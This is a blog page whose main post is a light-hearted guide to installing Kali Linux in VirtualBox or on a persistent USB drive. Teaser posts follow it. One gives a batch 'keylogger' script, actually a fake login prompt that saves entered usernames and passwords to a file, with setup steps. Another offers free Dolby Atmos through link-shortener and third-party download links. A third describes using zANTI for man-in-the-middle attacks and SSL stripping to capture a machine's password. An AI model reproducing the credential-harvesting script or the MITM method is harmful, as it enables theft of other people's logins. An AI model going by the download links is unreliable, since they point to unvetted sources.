Skip to main content

Get started with kali linux

This post is for so many of the people in the community asking for and having problems installing Kali Linux.
Here is a guide to getting started with Kali Linux. First of all, there are two ways to install and use Kali Linux, a complete installation, or in some Virtual Box like VMware or Virtual box. You can download VMware or Virtual Box by clicking on their respective names. I personally prefer Virtual Box because it has almost all the features of VMware and is a freeware (OMFG ITS FREE!). And download Kali from here.
There is only difference of a few steps; that will be added for Virtual Machine users. So, I’m just going to demonstrate for Virtual Box users.
Now a very important step, you have to enable visualization from your BIOS. This is different for all motherboards, so Google how to do it for your specific motherboard. Then just follow the screenshots below.

Now that you have Virtual Box and Kali Linux, it’s time to get things going. Open Virtual Box, it’ll look something like this, without the Virtual Machines at the left.

For creating a VM, click on “New“,

Name it whatever you want to, then click “Next“. You will be prompted to select the amount of RAM you want to reserve for your VM.

Now, it’ll ask for hard drive space allocation, just leave at the default option, “Next“!

Here, select “VHD“, “Next“,

Select “Dynamically Allocated“,

Here, select the desired size of the Virtual Hard disk,

You have successfully created a VM. Bye!

Just kidding…. there’s still a lot.

Now, click on settings > storage > click on the cd image at the right hand corner, as shown. Now browse to your downloaded image. Click OK.

It’s finally complete. Click start.

For normal (non-VM) users follow along from here. I will be explaining all the ways you can install and use Kali.

First one is “Live” this option does not save any changes to your Kali account… it’s like uninstalling Kali every time you shut down.
Then, there’s persistence, this one is exactly opposite to the former, this saves all your settings and data.
Now for the most important one for non VM users (at least I think so :3). A prefatory note – please make a bootable flash drive (more than 8gigs is recommended) with the Kali Linux .iso that you download; persistence and encrypted persistence will only work on flash drives.

For persistence, there are many ways to do this, I’m going to describe the Linux method.

Type “gparted /dev/sdb”, you will find “/dev/sdb1 /dev/sdb2” and “unallocated area” right click within the unallocated section, then select new from the drop-down menu that appears. Create a Primary Partition, choose “ext 4” as the file system, and label the partition with the word: “persistence “. Click on “Add” then “Apply” and let the computer format the partition in “ext 4” with the label persistence. When the process is completed open up a terminal window and enter the following:

“mkdir -p /mnt/my_usb”
“mount /dev/sdb3 /mnt/my_usb”
“echo “/ union” > /mnt/my_usb/persistence.conf”
“umount /dev/sdb3”

Reboot and start the machine with Kali and select “Live USB Persistence”.
For encrypted persistence, it’s a very long process… so… will do that in a later post.
Now the last one, install… it’s just as it sounds, it permanently installs Kali Linux… this is for people who wish to use Kali as their daily driver.

Now, that you have booted into kali, here are some useful things you could do starting up and some fixes for some common problems.

First, let’s update & upgrade our installation,
Type “apt-get clean && apt-get update && apt-get upgrade –y”.
Another major problem I’ve noticed is the sound is always muted, to fix this, open a terminal window, type “apt-get install alsa-utils –y”, then right click on the small volume icon on the top right corner and select Sound Preferences, Change the Output volume slider to ON. Done!

Now, go do your own thing in Kali, explore, hack, test, crack hashes and burn the sh*t out of your CPU!! while I go be a genius billionaire playboy philanthropist. (yes I’m part time Iron Man) (Jarvis runs on UNIX, don’t you?… He says yes in a very rhetorical fashion).

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment

use zantu on android

Zanti 2 is a android application which is made up for network penetration testing. What Zanti 2 can do? Scan the whole network show alive host in the network scan port through Nmap for port Scanning Scan Service on each port and find vulnerability. Perform Brute force Attack Perform Shell Shock etc Vulnerability MITM : Man In The Middle Attack Session Hijackings SSL Striping Sniffing Packets Replace Image Redirect URL and IP Intercept and modified live download. Disclaimer –  I recommend that you test this tutorial on a system that belongs to YOU.   For Demonstration : Before  install Zanti your Phone must be rooted  .. In case your phone is not rooted search in the site you will find how to root android its very easy. I used Zanti in my android device and Scan the network. I choose the Mac OSx Machine which was my laptop. After that start The MITM on and SSL strip to grab some packets and try to grab the password of that machine. in the end i successfully travel the